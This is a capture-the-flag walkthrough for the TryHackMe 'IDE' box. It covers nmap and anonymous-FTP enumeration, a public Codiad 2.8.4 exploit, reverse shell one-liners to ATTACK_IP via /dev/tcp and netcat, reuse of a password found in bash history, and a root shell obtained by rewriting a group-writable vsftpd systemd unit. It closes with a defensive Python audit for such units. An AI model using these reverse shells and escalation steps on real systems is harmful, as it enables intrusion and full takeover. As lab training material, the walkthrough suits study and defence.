TryHackMe IDE Writeup

This writeup will help you solve the TryHackMe IDE box.
Before we start enumerating the box, add the following line to your /etc/hosts file.

echo " ide.thm" >> /etc/hosts

TryHackMe IDE – Enumeration

As usual, we start with an nmap port scan of the host. The -sC flag runs nmap's default
script set against the discovered services and -sV tries to identify service versions. The -p-
flag scans all 65535 TCP ports instead of nmap's default port list.

nmap -sV -sC -p- ide.thm

You can see the output of this scan below:

PORT      STATE SERVICE REASON  VERSION
21/tcp    open  ftp     syn-ack vsftpd 3.0.3
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:10.9.2.89
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 3
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp    open  ssh     syn-ack OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 e2:be:d3:3c:e8:76:81:ef:47:7e:d0:43:d4:28:14:28 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC94RvPaQ09Xx+jMj32opOMbghuvx4OeBVLc+/4Hascmrtsa+SMtQGSY7b+eyW8Zymxi94rGBIN2ydPxy3XXGtkaCdQluOEw5CqSdb/qyeH+L/1PwIhLrr+jzUoUzmQil+oUOpVMOkcW7a00BMSxMCij0HdhlVDNkWvPdGxKBviBDEKZAH0hJEfexz3Tm65cmBpMe7WCPiJGTvoU9weXUnO3+41Ig8qF7kNNfbHjTgS0+XTnDXk03nZwIIwdvP8dZ8lZHdooM8J9u0Zecu4OvPiC4XBzPYNs+6ntLziKlRMgQls0e3yMOaAuKfGYHJKwu4AcluJ/+g90Hr0UqmYLHEV
|   256 a8:82:e9:61:e4:bb:61:af:9f:3a:19:3b:64:bc:de:87 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBBzKTu7YDGKubQ4ADeCztKu0LL5RtBXnjgjE07e3Go/GbZB2vAP2J9OEQH/PwlssyImSnS3myib+gPdQx54lqZU=
|   256 24:46:75:a7:63:39:b6:3c:e9:f1:fc:a4:13:51:63:20 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIJ+oGPm8ZVYNUtX4r3Fpmcj9T9F2SjcRg4ansmeGR3cP
80/tcp    open  http    syn-ack Apache httpd 2.4.29 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET POST OPTIONS HEAD
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
62337/tcp open  http    syn-ack Apache httpd 2.4.29 ((Ubuntu))
|_http-favicon: Unknown favicon MD5: B4A327D2242C42CF2EE89C623279665F
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Codiad 2.8.4
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

There are four open ports. Port 21 serves FTP; importantly, anonymous login is allowed. Port 22 serves SSH. Port 80 serves a web server, and port 62337 serves a second web server running Codiad, a web-based IDE. For now, let's start with enumeration of the FTP server. Try to log in using the following command:

ftp ide.thm

When prompted, provide anonymous as the username and anything as the password. Once logged in, run the following command:

ls -al

The output of this command can be seen below:

drwxr-xr-x    2 0        0            4096 Jun 18 06:11 ...
drwxr-xr-x    3 0        114          4096 Jun 18 06:10 ..
drwxr-xr-x    3 0        114          4096 Jun 18 06:10 .

Here, we find a hidden directory named ... (three dots). Change into that directory. Within it, we locate a hidden file named - (a single dash). Execute the following command to download this file to your machine:

get ./-

The file you just downloaded has the following content:

Hey REDACTED_USERNAME,
I have reset the password as you have asked. Please use the default password to login. 
Also, please take care of the image file ;)
- drac.

It seems we have found a username! However, we still need a password and a service to use the credentials against. Next, we enumerate the service running on port 62337. Browsing to http://ide.thm:62337 shows the following web page:

TryHackMe IDE - Codiad

TryHackMe IDE – User Flag

We can log in to this portal using the username found earlier and an easy-to-guess password. If you are struggling to find the password, you can brute-force it using the passwords in this list. Codiad is a web-based IDE in which one can write and compile code. Version 2.8.4 is running on the server, and this version is exploitable with the following exploit (49705.py, used below).

To obtain a user shell, execute the following command:

python3 49705.py http://ide.thm:62337/ REDACTED_USER REDACTED_PASS ATTACK_IP ATTACK_PORT linux

After running the command above, run the following two commands in two separate shells:

echo 'bash -c "bash -i >/dev/tcp/ATTACK_IP/9002 0>&1 2>&1"' | nc -lnvp 9001 
nc -lnvp 9002

Confirm in the exploit's prompt that you are running these commands. Open the terminal in which you ran nc -lnvp 9002; you should find a shell spawned as the www-data user. Upgrade it to a fully interactive TTY shell by running the following commands (CTRL+Z and ENTER are key presses):

python3 -c 'import pty;pty.spawn("/bin/bash")'
CTRL+Z
stty raw -echo;fg
ENTER
ENTER

Now that we have an initial foothold on the server, we need to gain user privileges. Checking /home, we find that only one user, drac, has a home directory there. The bash history of that user is readable by everyone. Run the following command to read it:

cat /home/drac/.bash_history

We find the following line in the .bash_history file:

mysql -u drac -p 'REDACTED'

The drac user might have reused this password for his account as well. Let's check whether this is the case by running:

su drac

Enter the password you just found to gain access as the drac user!

TryHackMe IDE – Root Flag

Checking which commands the drac user may run with sudo -l gives the following output:

Matching Defaults entries for drac on ide:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User drac may run the following commands on ide:
    (ALL : ALL) /usr/sbin/service vsftpd restart

The sudo rule lets drac run the restart command of the vsftpd service as root. If we can edit the service's unit file as the current user, we should be able to elevate privileges. First, find the location of the unit file by running:

systemctl status vsftpd

The output of this command is shown below:

● vsftpd.service - vsftpd FTP server
   Loaded: loaded (/lib/systemd/system/vsftpd.service; enabled; vendor preset: e
   Active: active (running) since Mon 2021-11-15 16:19:04 UTC; 37min ago
  Process: 743 ExecStartPre=/bin/mkdir -p /var/run/vsftpd/empty (code=exited, st
 Main PID: 805 (vsftpd)
    Tasks: 1 (limit: 498)
   CGroup: /system.slice/vsftpd.service
           └─805 /usr/sbin/vsftpd /etc/vsftpd.conf

As you can see, the unit file is located at /lib/systemd/system/vsftpd.service. Check the permissions of this file by running:

ls -al /lib/systemd/system/vsftpd.service

The output is shown below:

-rw-rw-r-- 1 root drac 248 Aug  4 07:24 /lib/systemd/system/vsftpd.service

The unit file is writable by the drac group, meaning we can edit it without any permission issues. Open the file in your favorite editor and change its content to the following:

[Unit]
Description=vsftpd FTP server
After=network.target

[Service]
Type=simple
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/ATTACK_IP/9003 0>&1'
ExecReload=/bin/kill -HUP $MAINPID
ExecStartPre=-/bin/mkdir -p /var/run/vsftpd/empty

[Install]
WantedBy=multi-user.target

Now start a new Netcat listener on your local machine by running:

nc -lvnp 9003

Because the unit file has been edited, first run systemctl daemon-reload; enter the drac user's password when prompted. Afterwards, run:

sudo /usr/sbin/service vsftpd restart

After restarting the service, you should receive a root shell in the listening terminal. The root flag is located at /root/root.txt.

IDE was an easy box to root. It involves an old version of Codiad with a public exploit. It is also important to use strong authentication rather than default or reused passwords. Last,
users should not have full control over a Linux service; if they do, they can elevate privileges fairly easily.
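As an added defensive check (not part of the original writeup), the following Python audit pairs the two conditions this box relied on: a sudo rule that lets a user restart a service, and a unit file that the same user can edit. It assumes the sudo rule has the /usr/sbin/service form shown above and that unit files live under /lib/systemd/system; the sudo and unit texts are parsed as plain strings so the checks are testable without root.

```python
"""Audit systemd units for the weakness used on this box: a unit a low-privileged
user can both edit (group-writable, non-root group) and restart via sudo."""
import os
import re
import stat

# Sudo rule shape from the writeup: (ALL : ALL) /usr/sbin/service vsftpd restart
SUDO_SERVICE = re.compile(r"/usr/sbin/service\s+(\S+)\s+(?:restart|reload|start|stop)")
EXEC_LINE = re.compile(r"^\s*Exec(StartPre|StartPost|Start|Reload|Stop)\s*=\s*(.*)$")
# Heuristic: shell wrappers or /dev/tcp in an Exec line, as in the backdoored unit
SUSPICIOUS = re.compile(r"/dev/tcp/|/bin/(?:ba)?sh\s+-c\b")


def services_from_sudo(sudo_l_output: str) -> list[str]:
    """Service names a user may start/stop/restart via sudo, from `sudo -l` text."""
    return SUDO_SERVICE.findall(sudo_l_output)


def audit_mode(mode: int, uid: int, gid: int) -> list[str]:
    """Pure check on stat() fields, so it is testable without root.
    A unit under /lib/systemd/system should be 0644 and owned by root:root."""
    findings = []
    if uid != 0:
        findings.append(f"owner is uid {uid}, not root")
    if mode & stat.S_IWGRP and gid != 0:
        findings.append(f"group-writable by non-root gid {gid}")
    if mode & stat.S_IWOTH:
        findings.append("world-writable")
    return findings


def audit_exec_lines(unit_text: str) -> list[str]:
    """Flag Exec* directives that spawn a shell or open /dev/tcp."""
    findings = []
    for line in unit_text.splitlines():
        m = EXEC_LINE.match(line)
        if m and SUSPICIOUS.search(m.group(2)):
            findings.append(f"suspicious Exec{m.group(1)}: {m.group(2).strip()}")
    return findings


def audit_unit(path: str) -> list[str]:
    """Run both checks against a unit file on disk (e.g. for each service
    returned by services_from_sudo): permissions first, then Exec* lines."""
    st = os.stat(path)
    with open(path, encoding="utf-8", errors="replace") as fh:
        text = fh.read()
    return audit_mode(st.st_mode, st.st_uid, st.st_gid) + audit_exec_lines(text)
```

On this box, audit_unit("/lib/systemd/system/vsftpd.service") run as drac would report the group-writable bit before any edit, and the shell wrapper in ExecStart after it.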
